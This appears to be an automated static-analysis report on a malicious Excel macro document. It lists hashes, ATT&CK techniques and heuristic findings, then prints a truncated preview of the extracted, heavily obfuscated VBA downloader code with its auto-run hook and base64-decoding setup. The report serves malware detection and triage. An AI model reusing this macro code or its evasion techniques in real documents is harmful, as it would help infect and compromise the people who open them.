Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 077e8187752ae132…

MALICIOUS

Office (OLE)

52.5 KB Created: 2018-09-09 22:27:32 Authoring application: Microsoft Excel First seen: 2019-04-18
MD5: 317840e9f376d6bc77f2cfb54f5cd38d SHA-1: 713c12b37ea5d4ebaefbda582651a81a94eafcb5 SHA-256: 077e8187752ae1321cbb896609a796375590a5c060ffbbae5391266be5ddd676
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Workbook_Open event, which is a common technique for initial execution. The macro code is heavily obfuscated, including reassembling API names from split string literals, indicating malicious intent. The primary goal appears to be downloading and executing a secondary payload, though the specific URL or mechanism is not directly extractable from the provided obfuscated code.

Heuristics 6

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11768 bytes
SHA-256: 7e782dbff70003b921fd5f077f6d1586ec6c835c035d8b0533ab43cfbcf4abe7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
x1RbJPD.YqYK8SL91e4PUszuZpw_
While 20 = 37
Dim spUxIM_V18d9EN As Boolean
Wend
Dim FRej7kjH4m As Worksheet
While 1 = 46
Dim qpJaJjjur5sU As Boolean
Wend
Dim kAtNzG3A4IFzsb4 As Worksheet
While 9 = 31
Dim EybHfZJbg35 As Boolean
Wend
Dim oW4LWSHuqczru As Worksheet
While 4 = 54
Dim bO3rfhTrqod As Boolean
Wend
Dim NvL4YhKU4adF As Worksheet

While 23 = 40
Dim quwp7uZOFpoO As Boolean
Wend
Dim ga58gK8rXPHf5 As Worksheet
While 6 = 42
Dim P4mUz_uvAtumu6M As Boolean
Wend
Dim MxhE7V7mMwrcvq As Worksheet
While 18 = 36
Dim YlOuEcektzncuZ As Boolean
Wend
Dim IL3ZAcIaiZ As Worksheet
While 26 = 48
Dim dSPYgGf9Dj As Boolean
Wend
Dim Fd2nbqlCrZbjf As Worksheet
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "x1RbJPD"
Dim feevJpISxli8fi7xic_RJmnZijSGj39E7mYfMx_dG8L8FMueRqLsxOw3zDKiUAs5lc_2HZiuXdIKYpSTywx3oOPqzfoIkdGENQUmL2V2FZTS_jcIt1thLyNVKQBltY As String
Dim FYKPlFDbMNrx7UDedMMqSfUDqJlL7q_JxWJSS2sgaKsamQD79AJbMumiDFiZdzeeIg_hItKkcpOGw3ZYEoM5fl7BtjOKRRBjpLQEPevMyh As String
Dim hKdyKXw9AlZSJQCYSICEuAgiZCI6ACRVXFhKoFM5tPBN3FFAbh_ViCRfn4XHNz88SC5CsztL6FUc9QoR5GcaC5wTwBgtq_p4RD5zJDQlwvZaqyfUNEMEUe5WOj As String
Dim e8iJzRqVYwh1CwGL8C6rNRGg1oe8EXFuTIJiB3wvT5BkQHOIucZM6vnLyBRJvsPAowe3lhIDOIVROeNrYULk73xgd7t_jl9knA6clUgLSV8uYT6Rvj As Integer

 Function b_4PbQf8BywkINKLqGdpyCrAugugW19d3vxXmzDpglDn_CRbYz_R84pYQ2e(kbn_yCU7lAVESmxBnj3M_cCawL6PdWumQVQsfIVnfo7qVEARCgopab)
While 24 = 36
Dim klqpS_7akTA As Boolean
Wend
Dim fKNBI4p1PH1 As Worksheet
While 8 = 40
Dim DNbyfoYc9C7MDI1 As Boolean
Wend
Dim fpXKTgMDxC7_ As Worksheet

 Dim Vg8NhrkJCb9ajMM2ORKviC_nN8YOkmX_ccPW5oyIZ7Vi7SJR6kGdONXRgS_iRThXC48F7y6ibBTkpYp5wES_e3xND7zkoO1EX7eCUDUEngAM3wlGlDvKAh3I_rB99T3LJNLr3lirtLT72jTPTq8
While 22 = 53
Dim f2WELzshbMd As Boolean
Wend
Dim cQBGT8i7J1QV9aD As Worksheet
While 20 = 30
Dim xRyImvhi2kk6sV As Boolean
Wend
Dim SkXQK44RY2EN_ As Worksheet


   Dim iPSoCQ_of8C1HwJq_yrcCjAu7aFAKgeam545X2BHYC6uvfJdWwbB
While 14 = 35
Dim vLNdWmGBZrQjq5q As Boolean
Wend
Dim HesAyizN2DwgId As Worksheet
While 2 = 45
Dim CWpvUlELRkT33Fq As Boolean
Wend
Dim c9KI3G_Yd58VY As Worksheet
   
While 7 = 41
Dim jE8ffuMK_HTe As Boolean
Wend
Dim YfqMN7UtVR As Worksheet
While 12 = 30
Dim g7T_x88KzW As Boolean
Wend
Dim OokLlwUG2ebz1m As Worksheet
 Set iPSoCQ_of8C1HwJq_yrcCjAu7aFAKgeam545X2BHYC6uvfJdWwbB = CreateObject(FYKPlFDbMNrx7UDedMMqSfUDqJlL7q_JxWJSS2sgaKsamQD79AJbMumiDFiZdzeeIg_hItKkcpOGw3ZYEoM5fl7BtjOKRRBjpLQEPevMyh)
While 2 = 37
Dim bkWJN7klCPg As Boolean
Wend
Dim AJf6OLxQ7Ot As Worksheet
While 22 = 41
Dim djakL11zqEqf As Boolean
Wend
Dim Liv63umkTokkyJk As Worksheet
   feevJpISxli8fi7xic_RJmnZijSGj39E7mYfMx_dG8L8FMueRqLsxOw3zDKiUAs5lc_2HZiuXdIKYpSTywx3oOPqzfoIkdGENQUmL2V2FZTS_jcIt1thLyNVKQBltY = Chr(339 - 241) & Chr(143 - 38) & Chr(368 - 258) & Chr(322 - 276) & Chr(344 - 246) & Chr(483 - 386) & Chr(257 - 142) & Chr(329 - 228) & Chr(264 - 210) & Chr(100 - 48)
While 25 = 38
Dim Qmg3Wrp2jw As Boolean
Wend
Dim UWtKYy4c9soZ1X As Worksheet
While 20 = 31
Dim JlGiy9yuANhK As Boolean
Wend
Dim IKRweqKHfV2Y4 As Worksheet
  Set Vg8NhrkJCb9ajMM2ORKviC_nN8YOkmX_ccPW5oyIZ7Vi7SJR6kGdONXRgS_iRThXC48F7y6ibBTkpYp5wES_e3xND7zkoO1EX7eCUDUEngAM3wlGlDvKAh3I_rB99T3LJNLr3lirtLT72jTPTq8 = iPSoCQ_of8C1HwJq_yrcCjAu7aFAKgeam545X2BHYC6uvfJdWwbB.createElement("I4VC7GToF7Z5uN")
While 28 = 51
Dim ypFya6zvHqujFC As Boolean
Wend
Dim k8iVdlMnrIKL As Worksheet
While 11 = 33
Dim Nr1xsrn9Qq6 As Boolean
Wend
Dim iRqY_d
... (truncated)